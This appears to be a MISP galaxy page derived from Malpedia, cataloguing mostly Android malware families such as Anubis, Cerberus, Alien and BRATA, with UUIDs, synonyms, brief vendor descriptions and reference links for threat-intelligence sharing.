Malpedia
Malware galaxy cluster based on Malpedia.
Authors
Authors and/or Contributors |
---|
Davide Arcuri |
Alexandre Dulaunoy |
Steffen Enders |
Andrea Garavaglia |
Andras Iklody |
Daniel Plohmann |
Christophe Vandeplas |
FastCash
Internal MISP references
UUID e8a04177-6a91-46a6-9f63-6a9fac4dfa02
which can be used as a unique global reference for FastCash in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash - webarchive
- https://github.com/fboldewin/FastCashMalwareDissected/ - webarchive
- https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/TA18-275A - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa20-239a - webarchive
- https://www.youtube.com/watch?v=zGvQPtejX9w - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf - webarchive
- https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf - webarchive
- https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf - webarchive
- https://www.us-cert.gov/ncas/alerts/TA18-275A - webarchive
- https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
888 RAT
Internal MISP references
UUID e98ae895-0831-4e10-aad1-593d1c678db1
which can be used as a unique global reference for 888 RAT in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Aberebot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aberebot.
Known Synonyms |
---|
Escobar |
Internal MISP references
UUID 4b9c0228-2bfd-4bc7-bd64-8357a2da12ee
which can be used as a unique global reference for Aberebot in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot - webarchive
- https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/ - webarchive
- https://blog.cyble.com/2022/03/10/aberebot-returns-as-escobar/ - webarchive
- https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/ - webarchive
- https://hothardware.com/news/escobar-banking-trojan-targets-mfa-codes - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://twitter.com/icebre4ker/status/1460527428544176128 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AbstractEmu
According to PCrisk, AbstractEmu is the name of rooting malware that can gain privileged access to the Android operating system. Threat actors behind AbstractEmu are using legitimate-looking apps (like password managers, app launchers, data savers) to trick users into downloading and opening/executing this malware.
Internal MISP references
UUID 57a4c8c0-140a-45e3-9166-64e3e35c5986
which can be used as a unique global reference for AbstractEmu in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.abstract_emu - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign - webarchive
- https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ActionSpy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ActionSpy.
Known Synonyms |
---|
AxeSpy |
Internal MISP references
UUID 5c7a35bf-e5f1-4b07-b93a-c3608cc9142e
which can be used as a unique global reference for ActionSpy in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/ - webarchive
- https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html - webarchive
- https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AdoBot
Internal MISP references
UUID d95708e9-220a-428c-b126-a63986099892
which can be used as a unique global reference for AdoBot in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AdultSwine
Internal MISP references
UUID 824f284b-b38b-4a57-9e4a-aee4061a5b2d
which can be used as a unique global reference for AdultSwine in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Agent Smith
Internal MISP references
UUID 34770e6e-e2c3-4e45-aa86-9d74b5309773
which can be used as a unique global reference for Agent Smith in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AhMyth
According to PCrisk, Ahmyth is a Remote Access Trojan (RAT) targeting Android users. It is distributed via trojanized (fake) applications. Ahmyth RAT steals cryptocurrency and banking credentials, 2FA codes, lock screen passcodes, and captures screenshots.
Internal MISP references
UUID 86a5bb47-ac59-449a-8ff2-ae46e19cc6d2
which can be used as a unique global reference for AhMyth in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth - webarchive
- https://www.secrss.com/articles/24995 - webarchive
- https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/ - webarchive
- https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset - webarchive
- https://deform.co/hacker-group-caracal-kitten-targets-kdp-activists-with-malware/ - webarchive
- https://securelist.com/transparent-tribe-part-2/98233/ - webarchive
- https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Alien
According to ThreatFabric, this is a fork of Cerberus v1 (active January 2020+). Alien is a rented banking trojan that can remotely control a phone and achieves RAT functionality by abusing TeamViewer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alien.
Known Synonyms |
---|
AlienBot |
Internal MISP references
UUID de483b10-4247-46b3-8ab5-77d089f0145c
which can be used as a unique global reference for Alien in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien - webarchive
- https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/ - webarchive
- https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html - webarchive
- https://drive.google.com/file/d/1qd7Nqjhe2vyGZ5bGm6gVw0mM1D6YDolu/view?usp=sharing - webarchive
- https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/ - webarchive
- https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html - webarchive
- https://twitter.com/CPResearch/status/1603375823448317953 - webarchive
- https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets - webarchive
- https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/ - webarchive
- https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/ - webarchive
- https://muha2xmad.github.io/malware-analysis/alien/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AmexTroll
Internal MISP references
UUID 6b153952-9415-4710-8175-354b59252dbc
which can be used as a unique global reference for AmexTroll in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AmpleBot
This malware was initially named BlackRock and later renamed to AmpleBot.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AmpleBot.
Known Synonyms |
---|
BlackRock |
Internal MISP references
UUID 2f3f82f6-ec21-489e-8257-0967c567798a
which can be used as a unique global reference for AmpleBot in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.amplebot - webarchive
- https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html - webarchive
- https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html - webarchive
- https://www.threatfabric.com/blogs/blackrock_the_trojan_that_wanted_to_get_them_all.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Anatsa
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anatsa.
Known Synonyms |
---|
ReBot |
TeaBot |
Toddler |
Internal MISP references
UUID 147081b9-7e59-4613-ad55-bbc08141fee1
which can be used as a unique global reference for Anatsa in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa - webarchive
- https://twitter.com/icebre4ker/status/1416409813467156482 - webarchive
- https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/ - webarchive
- https://gbhackers.com/teabot-banking-trojan/ - webarchive
- https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe - webarchive
- https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html - webarchive
- https://www.threatfabric.com/blogs/anatsa-hits-uk-and-dach-with-new-campaign - webarchive
- https://www.threatfabric.com/blogs/anatsa-trojan-returns-targeting-europe-and-expanding-its-reach - webarchive
- https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered - webarchive
- https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html - webarchive
- https://labs.k7computing.com/?p=22407 - webarchive
- https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/ - webarchive
- https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf - webarchive
- https://twitter.com/ThreatFabric/status/1394958795508523008 - webarchive
- https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368 - webarchive
- https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html - webarchive
- https://labs.k7computing.com/index.php/play-store-app-serves-teabot-via-github/ - webarchive
- https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf - webarchive
- https://www.cleafy.com/cleafy-labs/a-stealthy-threat-uncovered-teabot-on-google-play-store - webarchive
- https://www.cleafy.com/documents/teabot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AndroRAT
AndroRAT is a remote administration tool developed in Java for the Android client side and in Java/Swing for the server. The name AndroRAT is a mix of Android and RAT (Remote Access Tool). It was developed by a team of 4 for a university project. The goal of the application is to give remote control of the Android system and retrieve information from it.
Internal MISP references
UUID 80447111-8085-40a4-a052-420926091ac6
which can be used as a unique global reference for AndroRAT in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat - webarchive
- https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg - webarchive
- https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat - webarchive
- https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html - webarchive
- https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf - webarchive
- https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/ - webarchive
- https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat - webarchive
- https://www.kaspersky.com/blog/mobile-malware-part-4/24290/ - webarchive
- https://github.com/DesignativeDave/androrat - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ANDROSNATCH
According to Google, a Chrome cookie stealer.
Internal MISP references
UUID 8cd795ed-3a4d-41a3-abb1-0c3dd3aa4eab
which can be used as a unique global reference for ANDROSNATCH in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Anubis (Android)
BleepingComputer found that Anubis will display fake phishing login forms when users open apps for targeted platforms in order to steal credentials. This overlay screen is shown over the real app's login screen to make victims think it is a legitimate login form, when in reality the entered credentials are sent to the attackers.
In the new version spotted by Lookout, Anubis now targets 394 apps and has the following capabilities:
- Recording screen activity and sound from the microphone
- Implementing a SOCKS5 proxy for covert communication and package delivery
- Capturing screenshots
- Sending mass SMS messages from the device to specified recipients
- Retrieving contacts stored on the device
- Sending, reading, deleting, and blocking notifications for SMS messages received by the device
- Scanning the device for files of interest to exfiltrate
- Locking the device screen and displaying a persistent ransom note
- Submitting USSD code requests to query bank balances
- Capturing GPS data and pedometer statistics
- Implementing a keylogger to steal credentials
- Monitoring active apps to mimic and perform overlay attacks
- Stopping malicious functionality and removing the malware from the device
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Anubis (Android).
Known Synonyms |
---|
BankBot |
android.bankbot |
android.bankspy |
Internal MISP references
UUID 85975621-5126-40cb-8083-55cbfa75121b
which can be used as a unique global reference for Anubis (Android) in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis - webarchive
- https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb - webarchive
- https://pentest.blog/n-ways-to-unpack-mobile-malware/ - webarchive
- https://muha2xmad.github.io/malware-analysis/anubis/ - webarchive
- https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html - webarchive
- http://blog.koodous.com/2017/05/bankbot-on-google-play.html - webarchive
- https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus - webarchive
- https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html - webarchive
- https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html - webarchive
- http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html - webarchive
- https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html - webarchive
- https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/ - webarchive
- https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html - webarchive
- https://www.threatfabric.com/blogs/2020_year_of_the_rat.html - webarchive
- https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/ - webarchive
- https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ - webarchive
- https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis - webarchive
- https://0x1c3n.tech/anubis-android-malware-analysis - webarchive
- https://community.riskiq.com/article/85b3db8c - webarchive
- https://www.youtube.com/watch?v=U0UsfO-0uJM - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/ - webarchive
- https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/ - webarchive
- https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/ - webarchive
- https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/ - webarchive
- http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html - webarchive
- https://securelist.com/mobile-malware-evolution-2019/96280/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AnubisSpy
Internal MISP references
UUID 06ffb614-33ca-4b04-bf3b-623e68754184
which can be used as a unique global reference for AnubisSpy in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubisspy - webarchive
- https://documents.trendmicro.com/assets/tech-brief-cyberespionage-campaign-sphinx-goes-mobile-with-anubisspy.pdf - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/cyberespionage-campaign-sphinx-goes-mobile-anubisspy/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Asacub
Internal MISP references
UUID dffa06ec-e94f-4fd7-8578-2a98aace5473
which can be used as a unique global reference for Asacub in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ashas
Internal MISP references
UUID aabcfbb6-6385-486d-a30b-e3a2edcf493d
which can be used as a unique global reference for Ashas in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ATANK
According to Lukas Stefanko, this is an open-source crypto-ransomware found on GitHub in 2018. It can encrypt and decrypt files (AES, key: 32 random chars, sent to the C&C) and uses email as the contact point, but will remove all files after 24 hours or after a reboot.
Internal MISP references
UUID 231f9f49-6752-49af-9ee0-7774578fcbe4
which can be used as a unique global reference for ATANK in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AxBanker
According to EnigmaSoft, AxBanker is a banking Trojan targeting Android devices specifically. The threatening tool has been deployed as part of large attack campaigns against users in India. The threat actors use smishing (SMS phishing) techniques to smuggle the malware threat onto the victims' devices. The fake applications carrying AxBanker are designed to visually impersonate the official applications of popular Indian banking organizations. The weaponized applications use fake promises or rewards and discounts as additional lures.
Internal MISP references
UUID 4a854e8c-d6ad-4997-8931-b27e39b7f7fa
which can be used as a unique global reference for AxBanker in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.axbanker - webarchive
- https://blog.polyswarm.io/phishing-and-android-malware-campaign-targets-indian-banks - webarchive
- https://www.trendmicro.com/en_vn/research/22/k/massive-phishing-campaigns-target-india-banks-clients.html#:~:text=We%20found%20five%20banking%20malware,card%20information%20via%20phishing%20campaigns.&text=We%20observed%20an%20uptick%20in,message%20with%20a%20phishing%20link. - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
badbazaar
BadBazaar is a type of malware primarily functioning as a banking Trojan. Designed to compromise Android devices, it is often distributed through malicious apps downloaded from unofficial app stores or third-party websites. Once installed, BadBazaar seeks to steal financial information and login credentials by intercepting SMS messages, performing screen recordings, and logging keystrokes on the device. Additionally, it can execute remote commands and download and install other malicious applications, further compromising the security of the affected device.
Internal MISP references
UUID 80b30290-40d3-4ce3-a878-2e0af4b107d8
which can be used as a unique global reference for badbazaar in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BADCALL (Android)
A remote access tool (RAT) payload on Android devices.
Internal MISP references
UUID 5eec00de-5d81-4907-817d-f99cb33d9b66
which can be used as a unique global reference for BADCALL (Android) in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BadPatch
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BadPatch.
Known Synonyms |
---|
WelcomeChat |
Internal MISP references
UUID 9b96e274-1602-48a4-8e0d-9f756d4e835b
which can be used as a unique global reference for BadPatch in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bahamut (Android)
According to PCrisk, Bahamut is the name of Android malware with spyware functionality. Threat actors use Bahamut to steal sensitive information. The newest malware version targets various messaging apps and personally identifiable information.
Internal MISP references
UUID 4038c3bc-b559-45bb-bac1-9665a54dedf9
which can be used as a unique global reference for Bahamut (Android) in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.bahamut - webarchive
- https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf - webarchive
- https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/ - webarchive
- https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/ - webarchive
- https://blog.cyble.com/2022/06/29/bahamut-android-malware-returns-with-new-spying-capabilities/ - webarchive
- https://www.trendmicro.com/en_us/research/18/h/the-urpage-connection-to-bahamut-confucius-and-patchwork.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/ - webarchive
- https://mp.weixin.qq.com/s/YAAybJBAvxqrQWYDg31BBw - webarchive
- https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Basbanke
Internal MISP references
UUID c59b65d6-d363-4b19-b082-d72508e782c0
which can be used as a unique global reference for Basbanke in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.basbanke - webarchive
- https://securelist.com/basbanke-trend-setting-brazilian-banking-trojan/90365/ - webarchive
- https://twitter.com/LukasStefanko/status/1280243673100402690 - webarchive
- https://seguranca-informatica.pt/hackers-are-again-attacking-portuguese-banking-organizations-via-android-trojan-banker/#.YHTDZS2tEUE - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BianLian (Android)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BianLian (Android).
Known Synonyms |
---|
Hydra |
Internal MISP references
UUID 1faaa5c5-ab4e-4101-b2d9-0e12207d70fc
which can be used as a unique global reference for BianLian (Android) in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.bianlian - webarchive
- https://cryptax.medium.com/quick-look-into-a-new-sample-of-android-bianlian-bc5619efa726 - webarchive
- https://cryptax.medium.com/creating-a-safe-dummy-c-c-to-test-android-bots-ffa6e7a3dce5 - webarchive
- https://cryptax.medium.com/bianlian-c-c-domain-name-4f226a29e221 - webarchive
- https://www.youtube.com/watch?v=DPFcvSy4OZk - webarchive
- https://www.threatfabric.com/blogs/bianlian_from_rags_to_riches_the_malware_dropper_that_had_a_dream.html - webarchive
- https://cryptax.medium.com/multidex-trick-to-unpack-android-bianlian-ed52eb791e56 - webarchive
- https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html - webarchive
- https://cryptax.medium.com/bad-zip-and-new-packer-for-android-bianlian-5bdad4b90aeb - webarchive
- https://cryptax.medium.com/android-bianlian-payload-61febabed00a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BingoMod
Internal MISP references
UUID 2778f61a-48e4-4585-8eff-983d5a4fd6ac
which can be used as a unique global reference for BingoMod in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlankBot
Internal MISP references
UUID c4a42580-bc5e-4185-adfd-cc6ade9b8424
which can be used as a unique global reference for BlankBot in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BrasDex
According to PCrisk, BrasDex is banking malware targeting Android operating systems. This malicious program aims to gain access to victims' bank accounts and make fraudulent transactions.
At the time of writing, BrasDex targets Brazilian banking applications exclusively. In previous BrasDex campaigns, it infiltrated devices under the guise of Android system-related apps. Lately, this malware has been installed by a fake Brazilian Banco Santander banking application.
Internal MISP references
UUID dc5408e9-e9e8-44fd-ac5c-231483d0ebe3
which can be used as a unique global reference for BrasDex in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BRATA
According to Cleafy, the victim's Android device is factory reset after the attackers siphon money from the victim's bank account. This distracts users from the crime, while removing traces or footprints that might be of interest to forensic analysts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BRATA.
Known Synonyms |
---|
AmexTroll |
Copybara |
Internal MISP references
UUID d9ff080d-cde0-48da-89db-53435c99446b
which can be used as a unique global reference for BRATA in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.brata - webarchive
- https://www.threatfabric.com/blogs/toad-fraud - webarchive
- https://www.cleafy.com/cleafy-labs/brata-is-evolving-into-an-advanced-persistent-threat - webarchive
- https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam - webarchive
- https://www.cleafy.com/cleafy-labs/mobile-banking-fraud-brata-strikes-again - webarchive
- https://securelist.com/spying-android-rat-from-brazil-brata/92775/ - webarchive
- https://www.threatfabric.com/blogs/brata-a-tale-of-three-families.html - webarchive
- https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Brunhilda
PRODAFT describes Brunhilda as a "Dropper as a Service" for Google Play, delivering e.g. Alien.
Internal MISP references
UUID 5d3d5f52-0a55-4c81-af87-7809ce43906b
which can be used as a unique global reference for Brunhilda in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.brunhilda - webarchive
- https://blog.fox-it.com/2024/03/28/android-malware-vultur-expands-its-wingspan - webarchive
- https://www.threatfabric.com/blogs/the-attack-of-the-droppers.html - webarchive
- https://www.cleafy.com/cleafy-labs/the-android-malwares-journey-from-google-play-to-banking-fraud - webarchive
- https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BusyGasper
Internal MISP references
UUID 4bf68bf8-08e5-46f3-ade5-0bd4f124b168
which can be used as a unique global reference for BusyGasper in MISP communities and other software using the MISP galaxy.
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CapraRAT
According to PCrisk, CapraRAT is the name of an Android remote access trojan (RAT), possibly a modified version of another (open-source) RAT called AndroRAT. It is known that CapraRAT is used by an advanced persistent threat group (APT) called APT36 (also known as Earth Karkaddan). CapraRAT allows attackers to perform certain actions on the infected Android device.
Internal MISP references
UUID 7cd1c5f3-7635-46d2-87f1-e638fb8d714c
which can be used as a unique global reference for CapraRAT in MISP communities and other software using the MISP galaxy.
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.capra_rat - webarchive
- https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/ - webarchive
- https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html - webarchive
- https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CarbonSteal
Internal MISP references
UUID 56090c0b-2b9b-4624-8eff-ef6d3632fd2b
which can be used as unique global reference for CarbonSteal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Catelites
Catelites Bot (identified by Avast and SfyLabs in December 2017) is an Android trojan with ties to CronBot. Once the malicious app is installed, the attackers use social engineering and window overlays to obtain credit card details from the victim. The distribution vector appears to be fake apps on third-party app stores (not Google Play) or malvertising. After installation and activation, the app creates fake Gmail, Google Play and Chrome icons. It also sends a fake system notification telling the victim that they need to re-authenticate with Google Services and asks for their credit card details. At the time of writing the malware carried overlays for more than 2,200 banking and financial apps.
Internal MISP references
UUID 2c672b27-bc65-48ba-ba3d-6318473e78b6
which can be used as unique global reference for Catelites
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cerberus
According to PCrisk, Cerberus is an Android banking trojan that is rented out on hacker forums. It was created in 2019 and is used to steal sensitive, confidential information. Cerberus can also receive commands from its operators and perform dangerous actions on the infected device.
Internal MISP references
UUID c3a2448f-bb41-4201-b524-3ddcb02ddbf4
which can be used as unique global reference for Cerberus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/apk.cerberus - webarchive
- https://twitter.com/AndroidCerberus - webarchive
- https://cyberint.com/blog/research/cerberus-is-dead-long-live-cerberus/ - webarchive
- https://github.com/ics-iot-bootcamp/cerberus_research - webarchive
- https://www.forbes.com/sites/zakdoffman/2019/08/16/dangerous-new-android-trojan-hides-from-malware-researchers-and-taunts-them-on-twitter/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12075509/EN_The-State-of-Stalkerware-2021.pdf - webarchive
- https://labs.bitdefender.com/2020/09/apps-on-google-play-tainted-with-cerberus-banker-malware/ - webarchive
- https://insights.oem.avira.com/in-depth-analysis-of-a-cerberus-trojan-variant/ - webarchive
- https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-1016.pdf - webarchive
- https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html - webarchive
- https://www.threatfabric.com/blogs/ermac-another-cerberus-reborn.html - webarchive
